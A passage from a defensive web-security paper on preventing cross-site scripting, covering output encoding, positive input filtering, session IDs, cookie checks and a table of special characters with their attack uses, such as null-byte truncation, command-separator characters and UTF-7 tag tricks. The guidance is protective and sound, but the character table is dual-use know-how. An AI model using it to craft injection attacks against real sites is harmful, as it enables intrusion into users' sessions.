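    # www.anonymous.com.evil.org are not accepted.
    return parts.scheme in ("http", "https") and parts.hostname == trusted_host
```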
Embedded Files and Objects
As witnessed by the Flash!
Attack, attackers may be capable of embedding scripting components that
can be interpreted by the client web browser and used to conduct a CSS
attack.
For inclusion within a HTML based document, embedded files and objects are referred to using the HTML <EMBED> and <OBJECT> tags. Several options are available for decreasing the threat of embedded CSS attacks:
- The safest option is to treat <EMBED> and <OBJECT> tags the same as <SCRIPT> tags, and disallow any content to be submitted to the application that contains such data strings.
- Depending upon the format of the embedded object, it may be possible to filter content based upon content within the object. For instance, with Flash! files, it would be possible to remove all instances where the getURL() field contains a reference to a site other than the current application host. Alternatively, it may be possible to specify the target window as “_blank”, thus stopping any potential scripting code from being executed under the hosting domain's privileges.
HTTP POST not GET
In the majority of cases, remote
code insertion attacks are likely to be through the submission of user
data in HTML forms. One prevention step is to ensure that form
submission is only ever done through HTTP POST requests. Allowing HTTP
GET request submissions will potentially allow attackers to craft
distributable URLs containing the offending code.
When coding the server-side application, it is extremely important to ensure that the client-side data can only be received through HTTP POST variables. Most web hosting applications will indicate the variable delivery method.
Forcing the use of HTTP POST over GET is a simple process and easy to implement.
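As an illustration, a server-side handler can refuse to read form fields unless they arrived in the body of a POST request. The Python sketch below assumes the request method and raw body are already available as strings; the function and exception names are hypothetical.

```python
from urllib.parse import parse_qs


class MethodNotAllowed(Exception):
    """Raised when form data arrives by any method other than POST."""


def read_form(method: str, body: str) -> dict:
    """Parse form fields from the request body, for POST requests only."""
    if method.upper() != "POST":
        raise MethodNotAllowed("form data is only accepted via HTTP POST")
    # Only the POST body is parsed; the URL query string is never consulted.
    return parse_qs(body, keep_blank_values=True)
```

With this arrangement, a crafted URL carrying the same field names in its query string is rejected instead of being processed.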
Cookie Inspection
Many applications utilise
cookies for managing the state of the communication, and local storage
of information relevant to the user. Application developers must ensure
that all cookie information is thoroughly checked and filtered before
insertion into the HTML documents. Attackers modifying persistent
cookies can also make their attacks persistent.
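One way to apply this check is to accept a cookie value only if it matches a narrow pattern of expected characters. The Python sketch below uses the standard library cookie parser; the permitted pattern, the cookie name used in the usage note and the function name are all assumptions chosen for illustration.

```python
import re
from http.cookies import CookieError, SimpleCookie

# Assumed policy: short values made of letters, digits, "_", "." and "-".
SAFE_VALUE = re.compile(r"[A-Za-z0-9_.-]{1,64}")


def safe_cookie_value(cookie_header: str, name: str, default: str = "") -> str:
    """Return a cookie value only if it passes the allow-list check."""
    jar = SimpleCookie()
    try:
        jar.load(cookie_header)
    except CookieError:
        # A header the parser rejects is treated as containing no cookies.
        return default
    morsel = jar.get(name)
    if morsel is None or not SAFE_VALUE.fullmatch(morsel.value):
        return default
    return morsel.value
```

For example, a hypothetical "theme" cookie set to "dark" is returned unchanged, while a value containing script tags falls back to the default before it can reach the HTML document.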
URL Session Identifier
In some circumstances, the use
of a unique session identifier for each valid user can be used to
prevent remote exploitation of URL based code insertion attacks.
As a user arrives at the web site, they are automatically allocated a unique session ID. This session ID can ONLY be obtained from one page on the site (usually the start/home page). Should a visitor try to access any other page within the site without a valid session ID, they are automatically redirected to the start page and issued one.
Should an attacker discover a CSS flaw with one application component, any crafted exploit URL will have to contain a valid session ID. By rigorously controlling the session ID timeout, the attacker will not be able to make use of the flaw (other than affecting the attacker locally) outside of this period.
For additional security, the session ID could also be made to include a hashed version (or checksum) of the client browser’s IP address.
URL session identifiers are often visible as:
http://trusted.org/app.jsp?session=h3uf8309ai9.830988
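A session identifier with a timeout and a tie to the client IP address could be sketched in Python as follows. This is only one possible design: it uses a keyed hash (HMAC-SHA256) rather than a plain hash or checksum, and the secret key handling, the 15 minute lifetime, the token layout and the function names are all assumptions.

```python
import hashlib
import hmac
import secrets
import time

# Assumed per-deployment secret; a real service would load it from configuration.
SECRET_KEY = secrets.token_bytes(32)
# Assumed session lifetime of 15 minutes, in seconds.
SESSION_LIFETIME = 15 * 60


def _sign(nonce: str, issued: int, client_ip: str) -> str:
    """Keyed hash over the nonce, the issue time and the client IP address."""
    message = f"{nonce}|{issued}|{client_ip}".encode()
    return hmac.new(SECRET_KEY, message, hashlib.sha256).hexdigest()


def issue_session_id(client_ip: str, now=None) -> str:
    """Create a session ID of the form nonce.issued.signature."""
    issued = int(time.time() if now is None else now)
    nonce = secrets.token_hex(8)
    return f"{nonce}.{issued}.{_sign(nonce, issued, client_ip)}"


def session_is_valid(session_id: str, client_ip: str, now=None) -> bool:
    """Check the layout, the timeout and the IP binding of a session ID."""
    try:
        nonce, issued_text, signature = session_id.split(".")
        issued = int(issued_text)
    except ValueError:
        return False
    current = time.time() if now is None else now
    if not 0 <= current - issued <= SESSION_LIFETIME:
        return False
    expected = _sign(nonce, issued, client_ip)
    # Constant-time comparison of the supplied and expected signatures.
    return hmac.compare_digest(signature.encode(), expected.encode())
```

An exploit URL carrying such an identifier stops working once the lifetime has passed, and is rejected when presented from a different IP address.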
Character Sets
The success of code injection
attacks relies heavily on the use of non a-Z characters. Some small
measure of security can be gained by ensuring that data
is filtered using an appropriate character set.
A popular character set is ISO 8859-1, which was the default in early versions of HTML and HTTP. Ensure all content pages include the following:
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
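The character set can also be declared in the HTTP response header, so that the browser does not have to guess the encoding. The Python sketch below encodes a page as ISO 8859-1 and builds a matching Content-Type header; the function name and the choice to replace unrepresentable characters with numeric character references are assumptions.

```python
def build_html_response(markup: str):
    """Encode a page as ISO 8859-1 and declare that character set explicitly."""
    # Characters outside ISO 8859-1 become numeric character references.
    body = markup.encode("iso-8859-1", errors="xmlcharrefreplace")
    headers = [
        ("Content-Type", "text/html; charset=ISO-8859-1"),
        ("Content-Length", str(len(body))),
    ]
    return headers, body
```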
Dangerous Content
Certain characters are of
special significance when inserted into web pages or URL content. These
characters are based upon the HTML specifications, context and browser
interpretation. If input to the application (or web site) is not
correctly validated, the following problems may occur:
- Session information from client cookies may be set and read,
- User input could be intercepted,
- Data integrity can be compromised,
- Foreign scripting components can be executed by the client browser in the context of the trusted source.
Character | Significance |
< | The less-than character introduces a HTML tag. |
> | The greater-than character is sometimes interpreted by client browsers as the end of a HTML tag, and assumes that the author of the page omitted an opening < in error. |
“ | The double quote character is often interpreted as the end of an attribute character. |
% | The percentage character is frequently used for encoding characters, such as their Unicode representation |
& | The ampersand introduces a character entity. It is possible to combine the double quote and ampersand characters (“& “ extravalue”) to combine character entities within a HTML tag. Within a URL, the & introduces a character entity. Also, often used by UNIX based operating systems for command execution. |
' | HTML tag attribute values can be enclosed within single quotes. |
SPACE | Although most good developers prefer to quote attribute values, it is possible to omit these entirely as long as white-space characters are introduced. The SPACE character can be used as white-space. When used within URL information, the SPACE character is interpreted as the end of a URL. |
TAB | Following the same white-space principles as the SPACE character, TAB may also be used. When used within URL information, the TAB character is interpreted as the end of a URL. |
; | ! | Semicolons, pipes and exclamation characters are used for additional command execution. |
- | The dash (or minus sign) can be used in database queries, and the creation of negative numbers. |
/ \ | The forward-slash and back-slash are often used for faking paths and queries. |
( ) { } [ ] | Brackets, curly brackets and square brackets are often used as script, program or regex expressions. |
* | Often used in database queries for “all” |
? $ @ : | Question mark, Dollar, At and Colon characters are often used as script or programming markers. |
Hex Version | The hex value of a character may be used, often for non-printable characters, such as: x00 Null bytes for truncating strings; x04 EOF for faking the end of files; x08 Backspace; x0a New Line for extra command execution; x0d Carriage Return for extra command execution; x1b Escape character for breaking out of procedures; x20 Spaces for faking URLs and other names; x7f Delete |
Non-ASCII | Within a URL, non-ASCII characters (character values of 128 and above in the ISO 8859-1 encoding) are not allowed. |
Three techniques are available for handling these special characters:
- Encode output based upon input parameters.
- Filter input parameters for special characters.
- Filter output based upon input parameters for special characters.
Depending upon the application,
and the particular phase of operation, it may be necessary to use
different techniques to handle the special characters. In most instances
input or output filtering will be sufficient. However, if particular
client data submissions are likely to contain special characters (e.g. a
complex database search query), it may be necessary to encode the
resultant data for presentation back to the client.
Encode output based upon input parameters
In this method, any
non-validated user data is always encoded to the appropriate HTML
characters as it is written back to the user. For instance the character
“<” would be encoded as “&lt;” and, although appearing to the
user as the less-than character, would not be interpreted by the client
application as the start of a HTML tag.
If a web page uses the UTF-7
character encoding, there are several different strings which will act
as a ‘<’ character and start an HTML tag; all of these strings start
with a ‘+’. It is also important that the use of the “%” encoding
character be carefully monitored, as it can be used to escape-encode or
Unicode-encode special characters that will be correctly interpreted by
the client web browser. There are many methods of encoding text and special
characters. A detailed analysis can be found in the earlier paper, “URL
Encoded Attacks”.
Microsoft Active Server Pages
<%
var BaseURL = "http://www.mysite.com/search2.asp?searchagain=";
// URL-encode the user-supplied value before placing it in a link
Response.Write("<a href=\"" + BaseURL + Server.URLEncode(Request.QueryString("SearchString")) + "\">click-me</a>");
%>
<%
// HTML-encode the user-supplied value before writing it into the page
Response.Write("Hello visitor <I>" + Server.HTMLEncode(Request.Form("UserName")) + "</I>");
%>
With Microsoft’s ASP, the HTMLEncode call converts the special characters in the submitted data into their HTML encoded form, which prevents any script within it from being executed.
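The same two encoding steps can be sketched in Python using only the standard library. This is an illustrative equivalent rather than part of the original paper: the function names are assumptions, and the base URL is reused from the ASP example.

```python
import html
from urllib.parse import quote

# Base URL reused from the ASP example above.
BASE_URL = "http://www.mysite.com/search2.asp?searchagain="


def search_again_link(search_string: str) -> str:
    """Build a link with the user-supplied value percent-encoded."""
    # safe="" ensures every reserved character is escape-encoded.
    return '<a href="' + BASE_URL + quote(search_string, safe="") + '">click-me</a>'


def greeting(user_name: str) -> str:
    """Build a greeting with the user-supplied value HTML-encoded."""
    # html.escape converts <, >, & and both quote characters to entities.
    return "Hello visitor <I>" + html.escape(user_name, quote=True) + "</I>"
```

The value is encoded for the context it is written into: percent-encoding for the URL and entity encoding for the page body.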
Filter input parameters for special characters.
Input filtering works by
removing some or all special characters from user supplied data as it
reaches the server-side application components. Although it is possible
to implement client-side input filtering, this should never be relied
upon as it is often a trivial exercise for an attacker to bypass it.
Even if implemented at the client-side, the server-side processes should
carry out the same input filtering processes.
The recommended method of
implementing input filtering is to only select from the set of
characters that is known to be safe rather than excluding the named
special characters. This method is referred to as Positive filtering,
and by only selecting the characters that are acceptable, it will help
to reduce the ability to exploit other yet unknown vulnerabilities.
For example, a form field that
is expecting a person's age can be limited to the set of digits 0
through 9. There is no reason for this age element to accept any letters
or other special characters.
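The age example can be sketched in Python as a positive filter. The three digit limit and the function name are assumptions; the pattern uses the explicit range 0 through 9 rather than a general digit class, so that only ASCII digits are accepted.

```python
import re

# Assumed policy: one to three ASCII digits and nothing else.
AGE_PATTERN = re.compile(r"[0-9]{1,3}")


def parse_age(raw: str):
    """Return the age as an integer, or None if the input is not acceptable."""
    if AGE_PATTERN.fullmatch(raw) is None:
        return None
    return int(raw)
```

Anything outside the permitted set, including script fragments, signs and white space, is rejected outright instead of being repaired.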
Filter output based upon input parameters for special characters.
Output filtering functions
similarly to Input filtering, except that special characters are
filtered from the data at the server-side application before being sent
to the client web browser. This technique should be used when data is
retrieved from databases or storage formats, particularly when there is a
probability that non-filtered content could have been added by other
applications or system processes.
Special care should be taken
when using Output filtering. If the application outputs HTML content,
vigilance is required to ensure that special character filtering is
restricted to data that has been previously supplied by a user and
stored in a database. Filtering the special characters “<“ and “>“
too early in the process is likely to render the client HTML document
useless.
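The distinction can be sketched in Python as follows: the filter is applied only to the stored, user-supplied value, while the markup generated by the application itself is left untouched. The list of filtered characters is an assumed subset of the table of dangerous characters, and the function names are hypothetical.

```python
# Assumed subset of the dangerous characters listed earlier.
DANGEROUS = "<>\"'%&;()"


def filter_stored_value(value: str) -> str:
    """Remove special characters from data retrieved from storage."""
    return "".join(ch for ch in value if ch not in DANGEROUS)


def render_comment(stored_comment: str) -> str:
    """Wrap a filtered, user-supplied comment in application markup."""
    # Only the stored value is filtered; the <p> tags are added afterwards.
    return "<p>" + filter_stored_value(stored_comment) + "</p>"
```

Filtering the complete page instead of the stored value would also strip the application's own tags, which is the failure described above.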
Original Link to Paper:
http://www.technicalinfo.net/papers/CSS.html